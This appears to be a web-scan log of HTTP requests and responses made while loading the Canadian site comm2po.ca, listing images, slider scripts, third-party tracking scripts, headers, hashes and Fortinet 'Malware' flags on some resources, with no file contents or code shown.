TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:13 GMT
etag: "1580d66-37a30-5c17053fada40"
accept-ranges: bytes
content-length: 227888
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-513x401.png
72.167.59.18 200 OK 256 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 256 kB (256290 bytes)
Hash d4687f980072d7bb2d9e5477b92b7807
0f0b4327c7361996f9544425f084f9bf19ebd135
ed23259b0f5c3afef58bc378d8f20803ea62ada4a6e9ac234cb4c187000ccbf1
GET /wp-content/uploads/2021/04/DENTISTERY-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:15 GMT
etag: "1580d09-3e922-5c17054195ec0"
accept-ranges: bytes
content-length: 256290
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-1-513x401.png
72.167.59.18 200 OK 364 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 364 kB (363481 bytes)
Hash 96523798de3863a09e1aae8bfa1800e5
c1b07970983ac57a5b71b924ed6d0e6cf31810ad
8cc36a737b95817fa6d146fb1582d5c32f2850f768fbedb554c0d3cd3c0b2c64
GET /wp-content/uploads/2021/04/Vorlage-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:16 GMT
etag: "1580dcc-58bd9-5c1705428a100"
accept-ranges: bytes
content-length: 363481
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash 9405985bfe6aab7c008cf3a305f79b0f
d698b786300ea45e2cd1b9d3fadf2639e71efe5e
28c7a840f64d83b92b41d7255788845fbe83aefbee8acf3d8cb131ffd81f6267
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5329
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:41 GMT
Last-Modified: Wed, 21 Sep 2022 02:54:52 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
app.leadfox.co/js/detect.min.js?_=1586443542474
172.67.71.4 200 OK 21 kB URL HTTP/2 app.leadfox.co/js/detect.min.js?_=1586443542474
IP 172.67.71.4:0
File type Unicode text, UTF-8 text, with very long lines (2609)
Hash af5059cc7266e707b529c7ae10692bb8
cc2aa444c28f3a810e489c2f3c8df54de878acc7
d434123fad53a7e88e957a4956162d6731c1bc7a4ab21f8df8d344cf8c1e547c
GET /js/detect.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"a7c-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wEuuhdyx5Re7MFUn1pj%2Bixe%2BBndE41KJjRblUZh3QOedgf6DlgtY2WQ3xpnuMhfQdFvaOvAaijS8H%2Fvw6YRS%2Fyv8gIE07QpkSuGwhLDbr5%2BEvLsC8FymFSvA6bY5gJg3"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006de8ab9b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
142.250.74.170 200 OK 23 B URL HTTP/2 maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
IP 142.250.74.170:0
File type JSON data\012- , ASCII text
Hash e3981ca10169a319d5aa062bf43a5fa1
2c6ed584767b65688ce99b1ebe1a3b7448a67421
8b0b8749aba12de93f3cf5d86f9fac9d6de7cac400a17473718f182a34ebb7e9
GET /maps/api/mapsjs/gen_204?csp_test=true HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/json; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:41 GMT
server: scaffolding on HTTPServer2
cache-control: private
content-length: 23
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.comm2po.ca
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
connect.facebook.net/en_US/fbevents.js
157.240.200.14 200 OK 27 kB URL HTTP/2 connect.facebook.net/en_US/fbevents.js
IP 157.240.200.14:0
File type ASCII text, with very long lines (64348)
Hash 9ecd89752214ef749272eef344b9089a
70a58a49c08934265ee34c74efb01d6b3124095d
f76c51487e348977288fcaf83984cd8fe4e73758cc352402774d9eb94680d528
GET /en_US/fbevents.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-type: application/x-javascript; charset=utf-8
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: public
cache-control: public, max-age=1200
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: EAPtNMMRjsDvns4zjp5nH8eRWXQtVv813AcYIjA+D0RYVkuYpGjUeZu/HasuxEqY2mnsvUL5sA/RrGEVghCDDQ==
priority: u=3,i
content-length: 26839
x-fb-trip-id: 1679558926
date: Wed, 21 Sep 2022 04:23:41 GMT
alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash 9405985bfe6aab7c008cf3a305f79b0f
d698b786300ea45e2cd1b9d3fadf2639e71efe5e
28c7a840f64d83b92b41d7255788845fbe83aefbee8acf3d8cb131ffd81f6267
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5329
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:41 GMT
Last-Modified: Wed, 21 Sep 2022 02:54:52 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
www.comm2po.ca/?icl_ajx_action=get_browser_language
72.167.59.18 200 OK 9 B URL HTTP/2 www.comm2po.ca/?icl_ajx_action=get_browser_language
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with no line terminators
Hash 85195af014e30a83c0bf68b5e79606ae
e6ab71d0a8ca3fc0ca2215c648edb0e3693ee484
48378584ae0e9d5926960effac0f661f44045c69ed59932600acab1df91ca6ab
Analyzer | Verdict | Alert — fortinet | Malware
GET /?icl_ajx_action=get_browser_language HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: no-cache, must-revalidate
expires: Sat, 16 Aug 1980 05:00:00 GMT
set-cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:40 GMT; Max-Age=86400; path=/
content-encoding: br
content-length: 9
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/favicon.ico
72.167.59.18 200 OK 334 B URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/favicon.ico
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel\012- data
Hash daef6820b1b3e7bb9f65541b4e417223
68d07c615e288713f368c5405fc1c3174f72f363
cc9bd62da168338828957d3251e0a00a60334c090b50697229587b794264ac34
GET /wp-content/uploads/2015/05/favicon.ico HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 09:40:00 GMT
etag: "15800aa-47e-5168035ee7c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 334
content-type: image/x-icon
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/logo_BW.png
72.167.59.18 200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/logo_BW.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 121 x 80, 8-bit/color RGBA, non-interlaced\012- data
Hash ec5a697e58986ee850ddda77287a5f8f
3221d97ec3f52f3210565adda79ff887e037776d
9b6a35e56a8a51c56a40402bf9bc2940030cf34ee601749d94bb5d2f73b1109c
GET /wp-content/uploads/2015/05/logo_BW.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 11:10:53 GMT
etag: "15800ad-936-516817af4a940"
accept-ranges: bytes
content-length: 2358
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/en/
72.167.59.18 200 OK 15 kB IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (2439), with CRLF, LF line terminators
Hash 727d2a0ba00175c82ff9cb9e9ce28366
3be048e0cd7f6f5d551a24ae0ed732f51b6e9396
441898b893b5ae7131528118de312f34d9764b7f4268b0af6c3c44880bfef7ee
Analyzer | Verdict | Alert — fortinet | Malware
GET /en/ HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: max-age=3, must-revalidate
content-encoding: br
content-length: 15347
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8
72.167.59.18 200 OK 6.7 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (25833), with CRLF line terminators
Hash e8fcd6b43bc732267192b1d9c238a575
4c7dc7cd56c113c6fa113089ef7c63907cbc8752
ae071dc8b7172b3604ebe83b8e1d2db5af9f74d73e83cdfd8a7987ae125a02fc
Analyzer | Verdict | Alert — fortinet | Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d2-65df-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6697
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8
72.167.59.18 200 OK 3.0 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10692), with CRLF line terminators
Hash 1872eeeb19c147c7719d286f74563b53
a5f9f14c4ab6a1f26df6e472e3168493a085a2c8
3e36368893237bff254320682110a220f1f13c3e06222d91ac25044486db8616
Analyzer | Verdict | Alert — fortinet | Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d0-2ab3-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3011
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8
72.167.59.18 200 OK 6.5 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (28818), with CRLF line terminators
Hash 6280f70224172de2a66a8f73f3f933fc
c5a06ac89d66cf178c7f655aa226ebf6cac46512
6dcf77bfef23923766c8a1c511ecfabd1f5d745fbe765c1584317e8a1c1a9dc7
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614d1-718e-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6531
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8
72.167.59.18 200 OK 14 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (55556), with CRLF line terminators
Hash 74707f26b7e6a75367b7ad799993e0a3
7ced582cc5c381872846add8e92940c187e5b4b2
57aaac3502411c137f10b1e5a2e1e3670dfe7dfced7101bffd381d7977a61f90
Analyzer | Verdict | Alert — fortinet | Malware
GET /wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js?version=5.4.8 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://www.comm2po.ca/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614cd-da01-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 13751
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
secure.leadforensics.com/js/147022.js
51.140.49.131 200 OK 136 B URL HTTP/1.1 secure.leadforensics.com/js/147022.js
IP 51.140.49.131:0
ASN #8075 MICROSOFT-CORP-MSN-AS-BLOCK
File type ASCII text, with no line terminators
Hash bb5bd93a4a1897303df838a0d514d877
6fef6703a36252ae2eea0126fd9bb8dc85b61f85
c3dcfc6bd153ed707bc55c33d9aad508a355322780b88334a84285646379d1c7
GET /js/147022.js HTTP/1.1
Host: secure.leadforensics.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Server: Kestrel
Request-Context: appId=cid-v1:abe8a76f-f1a2-4b2e-9017-0ea36ffb5c20
Date: Wed, 21 Sep 2022 04:23:41 GMT
Content-Length: 136
www.comm2po.ca/wp-content/uploads/2021/04/tcc-canada-513x401.jpg
72.167.59.18 200 OK 41 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/tcc-canada-513x401.jpg
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 513x401, components 3\012- data
Hash 899e22b7e8367b307b1644eb63877c0f
e167d9881213b66e60d717893a009a4536706668
ed778febe3f4710c387f5bf8e4fdcd49e092bd1985d23d47cc1428d0f5dc306e
GET /wp-content/uploads/2021/04/tcc-canada-513x401.jpg HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:23:24 GMT
etag: "1580e2a-a0b3-5c17038067b00"
accept-ranges: bytes
content-length: 41139
content-type: image/jpeg
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-513x401.png
72.167.59.18 200 OK 228 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 228 kB (227888 bytes)
Hash 9cde152a6750ad15b7d509cf7e2be2fa
3dd36be6f2c3394066d24c9841ade0a19c1dcab5
fad01e74d3003c5df6aa9561bd7046ef8696f8ead4aed6cec1cc4d84612d7741
GET /wp-content/uploads/2021/04/Lyticainc-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:54:06 GMT
etag: "1580d6b-37a30-5c170a5d12b80"
accept-ranges: bytes
content-length: 227888
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-1-513x401.png
72.167.59.18 200 OK 256 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/DENTISTERY-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 256 kB (256290 bytes)
Hash d4687f980072d7bb2d9e5477b92b7807
0f0b4327c7361996f9544425f084f9bf19ebd135
ed23259b0f5c3afef58bc378d8f20803ea62ada4a6e9ac234cb4c187000ccbf1
GET /wp-content/uploads/2021/04/DENTISTERY-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:10:53 GMT
etag: "1580d03-3e922-5c1700b432140"
accept-ranges: bytes
content-length: 256290
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-513x401.png
72.167.59.18 200 OK 364 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Vorlage-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 364 kB (363481 bytes)
Hash 96523798de3863a09e1aae8bfa1800e5
c1b07970983ac57a5b71b924ed6d0e6cf31810ad
